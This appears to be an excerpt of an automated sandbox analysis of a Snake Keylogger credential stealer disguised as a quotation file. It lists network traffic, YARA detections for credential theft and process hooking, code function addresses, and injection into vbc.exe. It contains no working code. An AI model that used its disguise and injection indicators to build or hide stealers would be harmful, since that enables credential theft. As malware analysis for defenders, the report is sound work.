                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49751 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_024DE0B40_2_024DE0B4
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_04D3D5B00_2_04D3D5B0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_04D3D5A10_2_04D3D5A1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D055290_2_06D05529
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D018C80_2_06D018C8
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D085B00_2_06D085B0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D0A0C00_2_06D0A0C0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D08E200_2_06D08E20
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D0AA700_2_06D0AA70
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D00B980_2_06D00B98
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D018B90_2_06D018B9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_06D089E80_2_06D089E8
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0763F7C00_2_0763F7C0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0763F7B00_2_0763F7B0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0897EB200_2_0897EB20
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0897B4680_2_0897B468
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0C3815880_2_0C381588
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_089700060_2_08970006
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_089700400_2_08970040
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_089756D90_2_089756D9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_089756E80_2_089756E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FC4687_2_053FC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FC7387_2_053FC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FC1477_2_053FC147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F53627_2_053F5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FD2787_2_053FD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F9DE07_2_053F9DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FCCD87_2_053FCCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FCFAA7_2_053FCFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F6FC87_2_053F6FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F3E097_2_053F3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F69A07_2_053F69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FE9887_2_053FE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FCA087_2_053FCA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FE97A7_2_053FE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF9617_2_053FF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F29EC7_2_053F29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F3A897_2_053F3A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB50287_2_09DB5028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB95487_2_09DB9548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB9C707_2_09DB9C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBFC687_2_09DBFC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBDE007_2_09DBDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD9997_2_09DBD999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD9A87_2_09DBD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB29687_2_09DB2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD0F87_2_09DBD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD0E97_2_09DBD0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB00407_2_09DB0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB501E7_2_09DB501E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB00127_2_09DB0012
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBF8107_2_09DBF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBF8017_2_09DBF801
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB8B917_2_09DB8B91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBF3B87_2_09DBF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBF3A87_2_09DBF3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB8BA07_2_09DB8BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBEB087_2_09DBEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB0B307_2_09DB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB93287_2_09DB9328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB0B207_2_09DB0B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBEAF87_2_09DBEAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBE2587_2_09DBE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBE2577_2_09DBE257
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBE2497_2_09DBE249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBDDF17_2_09DBDDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD5507_2_09DBD550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBD5407_2_09DBD540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBCCA07_2_09DBCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB9C097_2_09DB9C09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB178F7_2_09DB178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB17A07_2_09DB17A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBEF517_2_09DBEF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBEF607_2_09DBEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB1E807_2_09DB1E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBE6B07_2_09DBE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DBE6A07_2_09DBE6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB1E707_2_09DB1E70
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_024AE0B48_2_024AE0B4
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_071755298_2_07175529
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_071718C88_2_071718C8
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_071785B08_2_071785B0
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_0717A0C08_2_0717A0C0
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_07178E208_2_07178E20
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_07170B988_2_07170B98
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_0717AA708_2_0717AA70
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_071789E88_2_071789E8
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_071718B98_2_071718B9
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_0852B4688_2_0852B468
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_0852ED588_2_0852ED58
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_0852DFEE8_2_0852DFEE
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_085200408_2_08520040
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_085200068_2_08520006
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_085256D98_2_085256D9
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_085256E88_2_085256E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550C46812_2_0550C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550C73812_2_0550C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550C14612_2_0550C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550711812_2_05507118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550A08812_2_0550A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550536212_2_05505362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550D27812_2_0550D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550CCD812_2_0550CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550CFA912_2_0550CFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550E98812_2_0550E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055069A012_2_055069A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550CA0812_2_0550CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05503E0912_2_05503E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550E97A12_2_0550E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0550F96112_2_0550F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055029EC12_2_055029EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05503AA112_2_05503AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FE25812_2_0A8FE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F932812_2_0A8F9328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F0B3012_2_0A8F0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F502812_2_0A8F5028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F296812_2_0A8F2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F1E8012_2_0A8F1E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F17A012_2_0A8F17A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F9C1812_2_0A8F9C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FFC6812_2_0A8FFC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FEAF812_2_0A8FEAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FE24A12_2_0A8FE24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F8B9612_2_0A8F8B96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FF3A812_2_0A8FF3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F8BA012_2_0A8F8BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FF3B812_2_0A8FF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FEB0812_2_0A8FEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F0B2012_2_0A8F0B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD0E912_2_0A8FD0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD0F812_2_0A8FD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FF80212_2_0A8FF802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F501812_2_0A8F5018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FF81012_2_0A8FF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F003912_2_0A8F0039
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F004012_2_0A8F0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD99912_2_0A8FD999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD9A812_2_0A8FD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FE6A012_2_0A8FE6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FE6B012_2_0A8FE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FDE0012_2_0A8FDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F1E7012_2_0A8F1E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F178F12_2_0A8F178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FEF5112_2_0A8FEF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FEF6012_2_0A8FEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FCC8F12_2_0A8FCC8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FCCA012_2_0A8FCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FDDF112_2_0A8FDDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F954812_2_0A8F9548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD54012_2_0A8FD540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8FD55012_2_0A8FD550
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1637163266.00000000091F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1627609901.00000000008AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000000.1584433737.00000000003DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSnHY.exe0 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.00000000036D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1636286336.0000000006976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeBinary or memory string: OriginalFilenameSnHY.exe0 vs QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
